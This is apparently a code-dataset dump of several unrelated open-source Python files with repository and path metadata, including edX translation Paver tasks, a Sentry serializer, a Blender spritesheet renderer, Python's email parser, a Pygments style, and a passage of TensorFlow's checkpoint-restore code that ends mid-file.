for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_BRAINSClipInferior_outputs():
output_map = dict(outputVolume=dict(),
)
outputs = BRAINSClipInferior.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(outputs.traits()[key], metakey), value
|
msebire/intellij-community
|
refs/heads/master
|
python/testData/refactoring/move/relativeImportsToModulesInSameMovedPackageNotUpdated/after/src/subpkg/subsubpkg/__init__.py
|
12133432
| |
ifduyue/django
|
refs/heads/master
|
tests/migrations/test_migrations_squashed_extra/__init__.py
|
12133432
| |
cwolferh/heat-scratch
|
refs/heads/master
|
heat/api/__init__.py
|
12133432
| |
barseghyanartur/python-social-auth
|
refs/heads/master
|
examples/django_me_example/example/app/__init__.py
|
12133432
| |
Hodorable/0602
|
refs/heads/master
|
openstack_dashboard/dashboards/identity/domains/__init__.py
|
12133432
| |
eestay/edx-platform
|
refs/heads/master
|
pavelib/i18n.py
|
6
|
"""
Internationalization tasks
"""
import sys
import subprocess
from path import path
from paver.easy import task, cmdopts, needs, sh
try:
from pygments.console import colorize
except ImportError:
colorize = lambda color, text: text # pylint: disable-msg=invalid-name
@task
@needs(
"pavelib.i18n.i18n_validate_gettext",
"pavelib.assets.compile_coffeescript",
)
@cmdopts([
("verbose", "v", "Sets 'verbose' to True"),
])
def i18n_extract(options):
"""
Extract localizable strings from sources
"""
verbose = getattr(options, "verbose", None)
cmd = "i18n_tool extract"
if verbose:
cmd += " -vv"
sh(cmd)
@task
@needs("pavelib.i18n.i18n_extract")
def i18n_generate():
"""
Compile localizable strings from sources, extracting strings first.
"""
cmd = "i18n_tool generate"
sh(cmd)
@task
@needs("pavelib.i18n.i18n_extract")
def i18n_generate_strict():
"""
Compile localizable strings from sources, extracting strings first.
Complains if files are missing.
"""
cmd = "i18n_tool generate"
sh(cmd + " --strict")
@task
@needs("pavelib.i18n.i18n_extract")
def i18n_dummy():
"""
Simulate international translation by generating dummy strings
corresponding to source strings.
"""
cmd = "i18n_tool dummy"
sh(cmd)
# Need to then compile the new dummy strings
cmd = "i18n_tool generate"
sh(cmd)
@task
def i18n_validate_gettext():
"""
Make sure GNU gettext utilities are available
"""
returncode = subprocess.call(['which', 'xgettext'])
if returncode != 0:
msg = colorize(
'red',
"Cannot locate GNU gettext utilities, which are "
"required by django for internationalization.\n (see "
"https://docs.djangoproject.com/en/dev/topics/i18n/"
"translation/#message-files)\nTry downloading them from "
"http://www.gnu.org/software/gettext/ \n"
)
sys.stderr.write(msg)
sys.exit(1)
@task
def i18n_validate_transifex_config():
"""
Make sure config file with username/password exists
"""
home = path('~').expanduser()
config = home / '.transifexrc'
if not config.isfile or config.getsize == 0:
msg = colorize(
'red',
"Cannot connect to Transifex, config file is missing"
" or empty: {config} \nSee "
"http://help.transifex.com/features/client/#transifexrc \n".format(
config=config,
)
)
sys.stderr.write(msg)
sys.exit(1)
@task
@needs("pavelib.i18n.i18n_validate_transifex_config")
def i18n_transifex_push():
"""
Push source strings to Transifex for translation
"""
cmd = "i18n_tool transifex"
sh("{cmd} push".format(cmd=cmd))
@task
@needs("pavelib.i18n.i18n_validate_transifex_config")
def i18n_transifex_pull():
"""
Pull translated strings from Transifex
"""
cmd = "i18n_tool transifex"
sh("{cmd} pull".format(cmd=cmd))
@task
def i18n_rtl():
"""
Pull all RTL translations (reviewed AND unreviewed) from Transifex
"""
cmd = "i18n_tool transifex"
sh(cmd + " rtl")
print("Now generating langugage files...")
cmd = "i18n_tool generate"
sh(cmd + " --rtl")
print("Committing translations...")
sh('git clean -fdX conf/locale')
sh('git add conf/locale')
sh('git commit --amend')
@task
def i18n_ltr():
"""
Pull all LTR translations (reviewed AND unreviewed) from Transifex
"""
cmd = "i18n_tool transifex"
sh(cmd + " ltr")
print("Now generating langugage files...")
cmd = "i18n_tool generate"
sh(cmd + " --ltr")
print("Committing translations...")
sh('git clean -fdX conf/locale')
sh('git add conf/locale')
sh('git commit --amend')
@task
@needs(
"pavelib.i18n.i18n_transifex_pull",
"pavelib.i18n.i18n_extract",
"pavelib.i18n.i18n_dummy",
"pavelib.i18n.i18n_generate_strict",
)
def i18n_robot_pull():
"""
Pull source strings, generate po and mo files, and validate
"""
sh('git clean -fdX conf/locale')
# sh('paver test_i18n') # tests were removed from repo, but there should still be tests that cover the translations...
# Validate the recently pulled translations, and give a bail option
cmd = "i18n_tool validate"
sh("{cmd}".format(cmd=cmd))
con = raw_input("Continue with committing these translations (y/n)? ")
if con.lower() == 'y':
sh('git add conf/locale')
sh(
'git commit --message="Update translations '
'(autogenerated message)" --edit'
)
@task
@needs(
"pavelib.i18n.i18n_extract",
"pavelib.i18n.i18n_transifex_push",
)
def i18n_robot_push():
"""
Extract new strings, and push to transifex
"""
pass
|
vperron/sentry
|
refs/heads/master
|
src/sentry/api/serializers/models/team.py
|
13
|
from __future__ import absolute_import
import itertools
from collections import defaultdict
from sentry.api.serializers import Serializer, register, serialize
from sentry.models import (
OrganizationAccessRequest, OrganizationMemberType, Project, ProjectStatus,
Team
)
@register(Team)
class TeamSerializer(Serializer):
def get_attrs(self, item_list, user):
organization = item_list[0].organization
# TODO(dcramer): in most cases this data should already be in memory
# and we're simply duplicating efforts here
team_map = dict(
(t.id, t) for t in Team.objects.get_for_user(
organization=organization,
user=user,
)
)
if user.is_authenticated():
access_requests = frozenset(
OrganizationAccessRequest.objects.filter(
team__in=item_list,
member__user=user,
).values_list('team')
)
else:
access_requests = frozenset()
result = {}
for team in item_list:
try:
access_type = team_map[team.id].access_type
except KeyError:
access_type = None
result[team] = {
'access_type': access_type,
'pending_request': team.id in access_requests,
}
return result
def serialize(self, obj, attrs, user):
d = {
'id': str(obj.id),
'slug': obj.slug,
'name': obj.name,
'dateCreated': obj.date_added,
'isMember': attrs['access_type'] is not None,
'isPending': attrs['pending_request'],
'permission': {
'owner': attrs['access_type'] <= OrganizationMemberType.OWNER,
'admin': attrs['access_type'] <= OrganizationMemberType.ADMIN,
}
}
return d
class TeamWithProjectsSerializer(TeamSerializer):
def get_attrs(self, item_list, user):
project_qs = list(Project.objects.filter(
team__in=item_list,
status=ProjectStatus.VISIBLE,
).order_by('name', 'slug'))
project_map = defaultdict(list)
for project, data in itertools.izip(project_qs, serialize(project_qs, user)):
project_map[project.team_id].append(data)
result = super(TeamWithProjectsSerializer, self).get_attrs(item_list, user)
for team in item_list:
result[team]['projects'] = project_map[team.id]
return result
def serialize(self, obj, attrs, user):
d = super(TeamWithProjectsSerializer, self).serialize(obj, attrs, user)
d['projects'] = attrs['projects']
return d
|
mmalyska/eve-wspace
|
refs/heads/develop
|
evewspace/Jabber/alert_methods.py
|
25
|
from Alerts.method_registry import registry
from jabber_method import JabberAlertMethod
registry.register("Jabber", JabberAlertMethod)
|
bavoha/export2d
|
refs/heads/master
|
render_sprite.py
|
1
|
bl_info = {"name": "Render Spritesheet", "category": "Render"}
import bpy
import os
import addon_utils
class RenderSpritesheetOperator(bpy.types.Operator):
bl_idname = "render.render_sprite"
bl_label = "Render Spritesheet"
def _cleanup(self,path):
files = [ f for f in os.listdir(path) if f.endswith(".png") ]
for f in files:
if f[0:4] == '_tmp':
os.remove(path+"/"+f)
return
@classmethod
def poll(cls, context):
return context.active_object is not None
def execute(self, context):
#print("Running 2D sprite exporter...")
#self._cleanup()
c = 0
rot_obj = bpy.data.objects.get(context.scene.rotation_object)
if not rot_obj: rot_obj = bpy.context.active_object
old_rot = rot_obj.rotation_euler
sprite_path = os.path.expanduser(context.scene.sprite_path)
sprite_name = context.scene.sprite_name
#sprite_colors = context.scene.sprite_colors
#tools_path = context.scene.sprite_tools_path
num_frames = context.scene.number_frames
num_directions = context.scene.number_directions
res_x = context.scene.sprite_x
res_y = context.scene.sprite_y
bpy.context.scene.render.resolution_x = res_x
bpy.context.scene.render.resolution_y = res_y
bpy.context.scene.render.resolution_percentage = 100.0
for i in range(0,num_directions):
for f in range(0,num_frames):
bpy.context.scene.frame_current = f
bpy.context.scene.render.filepath = sprite_path+"/_tmp-000-%03d.png" % (c)
bpy.ops.render.render(write_still=True)
c += 1
rot_obj.rotation_euler[2] += -3.1415*2 / num_directions
rot_obj.rotation_euler = old_rot
try: os.mkdir(sprite_path)
except: pass
os.chdir(sprite_path)
#cmd = '"'+tools_path+'/montage" _tmp-000*.png -background transparent -geometry +0+0 -resize '+str(res_x)+'x'+str(res_y)+' -tile '+str(num_frames)+'x'+str(num_directions)+' '+sprite_name+'.png'
cmd = 'montage _tmp-000*.png -background transparent -geometry +0+0 -resize '+str(res_x)+'x'+str(res_y)+' -tile '+str(num_frames)+'x'+str(num_directions)+' '+sprite_name+'.png'
print(cmd)
r = os.system(cmd)
"""if sprite_colors != 0:
os.system('"'+tools_path+'/pngnqi" -vf -e -indexed.png -g 2.2 -s 1 -Q n -n '+str(sprite_colors)+' '+sprite_name+'.png')
os.system('"'+tools_path+'/pngout" /y /ktEXt '+sprite_name+'-indexed.png '+sprite_name+'-indexed.png')
os.remove(sprite_name+'.png')
os.rename(sprite_name+'-indexed.png', sprite_name+'.png')
"""
#os.startfile(sprite_path)
self._cleanup(sprite_path)
return {'FINISHED'}
class RenderSpritePanel(bpy.types.Panel):
bl_label = "Render Spritesheet"
bl_idname = "RENDER_SPRITESHEET"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "render"
def draw(self, context):
row = self.layout.row()
#col = row.column()
row.prop(bpy.context.scene, "rotation_object")
row = self.layout.row()
row.prop(bpy.context.scene, "number_directions")
row.prop(bpy.context.scene, "number_frames")
row = self.layout.row()
row.prop(bpy.context.scene, "sprite_path")
row = self.layout.row()
row.prop(bpy.context.scene, "sprite_name")
row = self.layout.row()
row.prop(bpy.context.scene, "sprite_x")
row.prop(bpy.context.scene, "sprite_y")
#row.prop(bpy.context.scene, "sprite_colors")
#row = self.layout.row()
#row.prop(bpy.context.scene, "sprite_tools_path")
row = self.layout.row()
row.operator("render.render_sprite")
def register():
bpy.types.Scene.rotation_object = bpy.props.StringProperty(name="Rot. Object", default="None")
bpy.types.Scene.number_directions = bpy.props.IntProperty(name="Num. Directions", default=8)
bpy.types.Scene.number_frames = bpy.props.IntProperty(name="Num. Frames", default=8)
bpy.types.Scene.sprite_x = bpy.props.IntProperty(name="Width", default=128)
bpy.types.Scene.sprite_y = bpy.props.IntProperty(name="Height", default=128)
bpy.types.Scene.sprite_path = bpy.props.StringProperty(name="Sprite Path:", default="~")
bpy.types.Scene.sprite_name = bpy.props.StringProperty(name="Sprite Name:", default="sprite")
#bpy.types.Scene.sprite_tools_path = bpy.props.StringProperty(name="Tools Path:", default=addon_utils.paths()[1] + "/")
#bpy.types.Scene.sprite_colors = bpy.props.IntProperty(name="Colors", default=0)
bpy.utils.register_class(RenderSpritesheetOperator)
bpy.utils.register_class(RenderSpritePanel)
def unregister():
bpy.utils.unregister_class(RenderSpritePanel)
bpy.utils.unregister_class(RenderSpritesheetOperator)
if __name__ == "__main__":
register()
|
saisai/phantomjs
|
refs/heads/master
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/common/checkout/commitinfo.py
|
118
|
# Copyright (c) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# WebKit's python module for holding information on a commit
from webkitpy.common.config import urls
from webkitpy.common.config.committers import CommitterList
class CommitInfo(object):
def __init__(self, revision, committer_email, changelog_data, committer_list=CommitterList()):
self._revision = revision
self._committer_email = committer_email
self._changelog_data = changelog_data
# Derived values:
self._committer = committer_list.committer_by_email(committer_email)
def revision(self):
return self._revision
def committer(self):
return self._committer # None if committer isn't in contributors.json
def committer_email(self):
return self._committer_email
def bug_id(self):
return self._changelog_data["bug_id"] # May be None
def author(self):
return self._changelog_data["author"] # May be None
def author_name(self):
return self._changelog_data["author_name"]
def author_email(self):
return self._changelog_data["author_email"]
def reviewer(self):
return self._changelog_data["reviewer"] # May be None
def reviewer_text(self):
return self._changelog_data["reviewer_text"] # May be None
def changed_files(self):
return self._changelog_data["changed_files"]
def to_json(self):
return {
"bug_id": self.bug_id(),
"author_name": self.author_name(),
"author_email": self.author_email(),
"reviewer_text": self.reviewer_text(),
"changed_files": self.changed_files(),
}
def responsible_parties(self):
responsible_parties = [
self.committer(),
self.author(),
self.reviewer(),
]
return set([party for party in responsible_parties if party]) # Filter out None
# FIXME: It is slightly lame that this "view" method is on this "model" class (in MVC terms)
def blame_string(self, bugs):
string = "r%s:\n" % self.revision()
string += " %s\n" % urls.view_revision_url(self.revision())
string += " Bug: %s (%s)\n" % (self.bug_id(), bugs.bug_url_for_bug_id(self.bug_id()))
author_line = "\"%s\" <%s>" % (self.author_name(), self.author_email())
string += " Author: %s\n" % (self.author() or author_line)
string += " Reviewer: %s\n" % (self.reviewer() or self.reviewer_text())
string += " Committer: %s" % self.committer()
return string
|
luistorresm/odoo
|
refs/heads/8.0
|
addons/website_membership/controllers/__init__.py
|
7372
|
import main
|
blacklin/kbengine
|
refs/heads/master
|
kbe/src/lib/python/Lib/email/parser.py
|
86
|
# Copyright (C) 2001-2007 Python Software Foundation
# Author: Barry Warsaw, Thomas Wouters, Anthony Baxter
# Contact: email-sig@python.org
"""A parser of RFC 2822 and MIME email messages."""
__all__ = ['Parser', 'HeaderParser', 'BytesParser', 'BytesHeaderParser',
'FeedParser', 'BytesFeedParser']
from io import StringIO, TextIOWrapper
from email.feedparser import FeedParser, BytesFeedParser
from email._policybase import compat32
class Parser:
def __init__(self, _class=None, *, policy=compat32):
"""Parser of RFC 2822 and MIME email messages.
Creates an in-memory object tree representing the email message, which
can then be manipulated and turned over to a Generator to return the
textual representation of the message.
The string must be formatted as a block of RFC 2822 headers and header
continuation lines, optionally preceeded by a `Unix-from' header. The
header block is terminated either by the end of the string or by a
blank line.
_class is the class to instantiate for new message objects when they
must be created. This class must have a constructor that can take
zero arguments. Default is Message.Message.
The policy keyword specifies a policy object that controls a number of
aspects of the parser's operation. The default policy maintains
backward compatibility.
"""
self._class = _class
self.policy = policy
def parse(self, fp, headersonly=False):
"""Create a message structure from the data in a file.
Reads all the data from the file and returns the root of the message
structure. Optional headersonly is a flag specifying whether to stop
parsing after reading the headers or not. The default is False,
meaning it parses the entire contents of the file.
"""
feedparser = FeedParser(self._class, policy=self.policy)
if headersonly:
feedparser._set_headersonly()
while True:
data = fp.read(8192)
if not data:
break
feedparser.feed(data)
return feedparser.close()
def parsestr(self, text, headersonly=False):
"""Create a message structure from a string.
Returns the root of the message structure. Optional headersonly is a
flag specifying whether to stop parsing after reading the headers or
not. The default is False, meaning it parses the entire contents of
the file.
"""
return self.parse(StringIO(text), headersonly=headersonly)
class HeaderParser(Parser):
def parse(self, fp, headersonly=True):
return Parser.parse(self, fp, True)
def parsestr(self, text, headersonly=True):
return Parser.parsestr(self, text, True)
class BytesParser:
def __init__(self, *args, **kw):
"""Parser of binary RFC 2822 and MIME email messages.
Creates an in-memory object tree representing the email message, which
can then be manipulated and turned over to a Generator to return the
textual representation of the message.
The input must be formatted as a block of RFC 2822 headers and header
continuation lines, optionally preceeded by a `Unix-from' header. The
header block is terminated either by the end of the input or by a
blank line.
_class is the class to instantiate for new message objects when they
must be created. This class must have a constructor that can take
zero arguments. Default is Message.Message.
"""
self.parser = Parser(*args, **kw)
def parse(self, fp, headersonly=False):
"""Create a message structure from the data in a binary file.
Reads all the data from the file and returns the root of the message
structure. Optional headersonly is a flag specifying whether to stop
parsing after reading the headers or not. The default is False,
meaning it parses the entire contents of the file.
"""
fp = TextIOWrapper(fp, encoding='ascii', errors='surrogateescape')
try:
return self.parser.parse(fp, headersonly)
finally:
fp.detach()
def parsebytes(self, text, headersonly=False):
"""Create a message structure from a byte string.
Returns the root of the message structure. Optional headersonly is a
flag specifying whether to stop parsing after reading the headers or
not. The default is False, meaning it parses the entire contents of
the file.
"""
text = text.decode('ASCII', errors='surrogateescape')
return self.parser.parsestr(text, headersonly)
class BytesHeaderParser(BytesParser):
def parse(self, fp, headersonly=True):
return BytesParser.parse(self, fp, headersonly=True)
def parsebytes(self, text, headersonly=True):
return BytesParser.parsebytes(self, text, headersonly=True)
|
gauribhoite/personfinder
|
refs/heads/master
|
env/site-packages/pygments/styles/trac.py
|
135
|
# -*- coding: utf-8 -*-
"""
pygments.styles.trac
~~~~~~~~~~~~~~~~~~~~
Port of the default trac highlighter design.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Whitespace
class TracStyle(Style):
"""
Port of the default trac highlighter design.
"""
default_style = ''
styles = {
Whitespace: '#bbbbbb',
Comment: 'italic #999988',
Comment.Preproc: 'bold noitalic #999999',
Comment.Special: 'bold #999999',
Operator: 'bold',
String: '#bb8844',
String.Regex: '#808000',
Number: '#009999',
Keyword: 'bold',
Keyword.Type: '#445588',
Name.Builtin: '#999999',
Name.Function: 'bold #990000',
Name.Class: 'bold #445588',
Name.Exception: 'bold #990000',
Name.Namespace: '#555555',
Name.Variable: '#008080',
Name.Constant: '#008080',
Name.Tag: '#000080',
Name.Attribute: '#008080',
Name.Entity: '#800080',
Generic.Heading: '#999999',
Generic.Subheading: '#aaaaaa',
Generic.Deleted: 'bg:#ffdddd #000000',
Generic.Inserted: 'bg:#ddffdd #000000',
Generic.Error: '#aa0000',
Generic.Emph: 'italic',
Generic.Strong: 'bold',
Generic.Prompt: '#555555',
Generic.Output: '#888888',
Generic.Traceback: '#aa0000',
Error: 'bg:#e3d2d2 #a61717'
}
|
hehongliang/tensorflow
|
refs/heads/master
|
tensorflow/python/training/checkpointable/base.py
|
11
|
"""An object-local variable management scheme."""
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import functools
import json
import weakref
import six
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_io_ops as io_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import saveable_object
from tensorflow.python.util import nest
from tensorflow.python.util import serialization
from tensorflow.python.util import tf_decorator
# Key where the object graph proto is saved in a TensorBundle
OBJECT_GRAPH_PROTO_KEY = "_CHECKPOINTABLE_OBJECT_GRAPH"
# A key indicating a variable's value in an object's checkpointed Tensors
# (Checkpointable._gather_saveables_for_checkpoint). If this is the only key and
# the object has no dependencies, then its value may be restored on object
# creation (avoiding double assignment when executing eagerly).
VARIABLE_VALUE_KEY = "VARIABLE_VALUE"
OBJECT_CONFIG_JSON_KEY = "OBJECT_CONFIG_JSON"
CheckpointableReference = collections.namedtuple(
"CheckpointableReference",
[
# The local name for this dependency.
"name",
# The Checkpointable object being referenced.
"ref"
])
class CheckpointInitialValue(ops.Tensor):
"""Tensor wrapper for managing update UIDs in `Variables`.
When supplied as an initial value, objects of this type let a `Variable`
(`Variable`, `ResourceVariable`, etc.) know the UID of the restore the initial
value came from. This allows deferred restorations to be sequenced in the
order the user specified them, and lets us fall back on assignment if an
initial value is not set (e.g. due to a custom getter interfering).
See comments in _add_variable_with_custom_getter for more information about
how `CheckpointInitialValue` is used.
"""
def __init__(self, checkpoint_position, shape=None):
self.wrapped_value = checkpoint_position.value_tensors()[
VARIABLE_VALUE_KEY]
if shape:
# We need to set the static shape information on the initializer if
# possible so we don't get a variable with an unknown shape.
self.wrapped_value.set_shape(shape)
self._checkpoint_position = checkpoint_position
def __getattr__(self, attr):
try:
return getattr(self.wrapped_value, attr)
except AttributeError:
return self.__getattribute__(attr)
@property
def checkpoint_position(self):
return self._checkpoint_position
class NoRestoreSaveable(saveable_object.SaveableObject):
"""Embeds a tensor in a checkpoint with no restore ops."""
def __init__(self, tensor, name, dtype=None):
spec = saveable_object.SaveSpec(tensor, "", name, dtype=dtype)
super(NoRestoreSaveable, self).__init__(tensor, [spec], name)
def restore(self, restored_tensors, restored_shapes):
return control_flow_ops.no_op()
@six.add_metaclass(abc.ABCMeta)
class PythonStateSaveable(saveable_object.SaveableObject):
"""An interface for saving/restoring volatile Python state."""
@abc.abstractmethod
def feed_dict_additions(self):
"""When running a graph, indicates fresh state to feed.
Returns:
A dictionary mapping `Tensor`s to current Python state.
"""
pass
@abc.abstractmethod
def freeze(self):
"""Create a new `SaveableObject` which freezes current state as a constant.
Used when executing eagerly to embed the current state as a constant, or
when creating a static tf.train.Saver with the frozen current Python state.
Returns:
A `SaveableObject` which is not a `PythonStateSaveable` instance (i.e. has
no Python state associated with it).
"""
pass
class PythonStringStateSaveable(PythonStateSaveable):
"""Saves Python state in a checkpoint."""
def __init__(self, name, state_callback, restore_callback=None):
"""Configure saving.
Args:
name: The checkpoint key to write to.
state_callback: A function taking no arguments which returns a
string. This function is run every time a checkpoint is written.
restore_callback: A function taking a Python string, used to restore
state. Optional; defaults to doing nothing.
"""
self._state_callback = state_callback
self._restore_callback = restore_callback
with ops.device("/cpu:0"):
self._save_string = constant_op.constant("", dtype=dtypes.string)
spec = saveable_object.SaveSpec(
self._save_string, "", name, dtype=dtypes.string)
super(PythonStringStateSaveable, self).__init__(
self._save_string, [spec], name)
def feed_dict_additions(self):
"""When running a graph, indicates fresh state to feed."""
return {self._save_string: self._state_callback()}
def freeze(self):
"""Create a frozen `SaveableObject` which saves the current state."""
return NoRestoreSaveable(
tensor=self._state_callback,
dtype=dtypes.string,
name=self.name)
def python_restore(self, restored_strings):
"""Called to restore Python state."""
if self._restore_callback:
restored, = restored_strings
self._restore_callback(restored)
def restore(self, restored_tensors, restored_shapes):
"""Called to restore TensorFlow state (nothing to do)."""
return control_flow_ops.no_op()
class _CheckpointPosition(object):
"""Indicates a position within a `_Checkpoint`."""
def __init__(self, checkpoint, proto_id):
"""Specify an object within a checkpoint.
Args:
checkpoint: A _Checkpoint object.
proto_id: The index of this object in CheckpointableObjectGraph.nodes.
"""
self._checkpoint = checkpoint
self._proto_id = proto_id
def restore(self, checkpointable):
"""Restore this value into `checkpointable`."""
with ops.init_scope():
if self.bind_object(checkpointable):
# This object's correspondence with a checkpointed object is new, so
# process deferred restorations for it and its dependencies.
restore_ops = checkpointable._restore_from_checkpoint_position(self) # pylint: disable=protected-access
if restore_ops:
self._checkpoint.new_restore_ops(restore_ops)
def bind_object(self, checkpointable):
"""Set a checkpoint<->object correspondence and process slot variables.
Args:
checkpointable: The object to record a correspondence for.
Returns:
True if this is a new assignment, False if this object has already been
mapped to a checkpointed `Object` proto.
Raises:
AssertionError: If another object is already bound to the `Object` proto.
"""
checkpoint = self.checkpoint
checkpoint.all_python_objects.add(checkpointable)
current_assignment = checkpoint.object_by_proto_id.get(self._proto_id, None)
if current_assignment is None:
checkpoint.object_by_proto_id[self._proto_id] = checkpointable
for deferred_slot_restoration in (
checkpoint.deferred_slot_restorations.pop(self._proto_id, ())):
checkpointable._create_or_restore_slot_variable( # pylint: disable=protected-access
slot_variable_position=_CheckpointPosition(
checkpoint=checkpoint,
proto_id=deferred_slot_restoration.slot_variable_id),
variable=deferred_slot_restoration.original_variable,
slot_name=deferred_slot_restoration.slot_name)
for slot_restoration in checkpoint.slot_restorations.pop(
self._proto_id, ()):
optimizer_object = checkpoint.object_by_proto_id.get(
slot_restoration.optimizer_id, None)
if optimizer_object is None:
# The optimizer has not yet been created or tracked. Record in the
# checkpoint that the slot variables need to be restored when it is.
checkpoint.deferred_slot_restorations.setdefault(
slot_restoration.optimizer_id, []).append(
_DeferredSlotVariableRestoration(
original_variable=checkpointable,
slot_variable_id=slot_restoration.slot_variable_id,
slot_name=slot_restoration.slot_name))
else:
optimizer_object._create_or_restore_slot_variable( # pylint: disable=protected-access
slot_variable_position=_CheckpointPosition(
checkpoint=checkpoint,
proto_id=slot_restoration.slot_variable_id),
variable=checkpointable,
slot_name=slot_restoration.slot_name)
return True # New assignment
else:
# The object was already mapped for this checkpoint load, which means
# we don't need to do anything besides check that the mapping is
# consistent (if the dependency DAG is not a tree then there are
# multiple paths to the same object).
if current_assignment is not checkpointable:
logging.warning(
("Inconsistent references when loading the checkpoint into this "
"object graph. Either the Checkpointable object references in the "
"Python program have changed in an incompatible way, or the "
"checkpoint was generated in an incompatible program.\n\nTwo "
"checkpoint references resolved to different objects (%s and %s).")
% (current_assignment, checkpointable))
return False # Not a new assignment
def is_simple_variable(self):
"""Determine whether this value is restorable with a Tensor initializer."""
attributes = self.object_proto.attributes
return (len(attributes) == 1
and attributes[0].name == VARIABLE_VALUE_KEY
and not self.object_proto.children)
def value_tensors(self):
"""Create value `Tensor`s for this object's attributes.
Does not require that the Python object has been created. Used for
restore-on-create when executing eagerly.
Returns:
A dictionary mapping from object attribute names to `Tensor`s.
"""
value_tensors = {}
for serialized_tensor in self.object_proto.attributes:
checkpoint_key = serialized_tensor.checkpoint_key
dtype = self._checkpoint.dtype_map[checkpoint_key]
base_type = dtype.base_dtype
with ops.init_scope():
with ops.device("/cpu:0"):
# Run the restore itself on the CPU.
value, = io_ops.restore_v2(
prefix=self._checkpoint.save_path_tensor,
tensor_names=[checkpoint_key],
shape_and_slices=[""],
dtypes=[base_type],
name="%s_checkpoint_read" % (serialized_tensor.name,))
# Copy the value to the current device if necessary.
value_tensors[serialized_tensor.name] = array_ops.identity(value)
return value_tensors
def _gather_ops_or_named_saveables(self):
"""Looks up or creates SaveableObjects which don't have cached ops."""
saveables = self.checkpointable._gather_saveables_for_checkpoint() # pylint: disable=protected-access
# Name saveables based on the name this object had when it was checkpointed.
named_saveables = {}
python_saveables = []
existing_restore_ops = []
for serialized_tensor in self.object_proto.attributes:
if context.executing_eagerly():
existing_op = None
else:
existing_op = self._checkpoint.restore_ops_by_name.get(
serialized_tensor.checkpoint_key, None)
if existing_op is not None:
existing_restore_ops.append(existing_op)
continue
# Only if we don't have cached ops for this SaveableObject, we'll see if
# the SaveableObject itself has been cached. If not, we'll make it, and
# either way we'll extract new ops from it (or if it has Python state to
# restore, we'll run that).
if self._checkpoint.saveable_object_cache is None:
# No SaveableObject caching when executing eagerly.
saveable = None
else:
# If we've already created and cached a SaveableObject for this
# attribute, we can re-use it to avoid re-creating some ops when graph
# building.
saveable_list = self._checkpoint.saveable_object_cache.get(
self.checkpointable, {}).get(serialized_tensor.name, (None,))
if len(saveable_list) == 1:
# Almost every attribute will have exactly one SaveableObject.
saveable, = saveable_list
else:
# Don't use cached SaveableObjects for partitioned variables, which is
# the only case where we'd have a list of SaveableObjects. Op caching
# will catch them.
saveable = None
if saveable is not None:
# The name of this attribute has changed, so we need to re-generate
# the SaveableObject.
if serialized_tensor.checkpoint_key not in saveable.name:
saveable = None
del self._checkpoint.saveable_object_cache[self.checkpointable]
break
if saveable is None:
# If there was no cached SaveableObject, we should check if the Python
# object has the attribute.
saveable_factory = saveables.get(serialized_tensor.name, None)
if saveable_factory is None:
# Purposefully does not throw an exception if attributes have been
# added or deleted. Stores unused attributes so an exception can be
# raised if the user decides to check that everything in the
# checkpoint was loaded.
self._checkpoint.unused_attributes.setdefault(
self.checkpointable, []).append(serialized_tensor.name)
continue
if callable(saveable_factory):
saveable = saveable_factory(name=serialized_tensor.checkpoint_key)
else:
saveable = saveable_factory
if self._checkpoint.saveable_object_cache is not None:
self._checkpoint.saveable_object_cache.setdefault(
self.checkpointable, {})[serialized_tensor.name] = [saveable]
if isinstance(saveable, PythonStateSaveable):
python_saveables.append(saveable)
else:
named_saveables[serialized_tensor.checkpoint_key] = saveable
return existing_restore_ops, named_saveables, python_saveables
def restore_ops(self):
"""Create or fetch restore ops for this object's attributes.
Requires that the `Checkpointable` Python object has been bound to an object
ID in the checkpoint.
Returns:
A list of operations when graph building, or an empty list when executing
eagerly.
"""
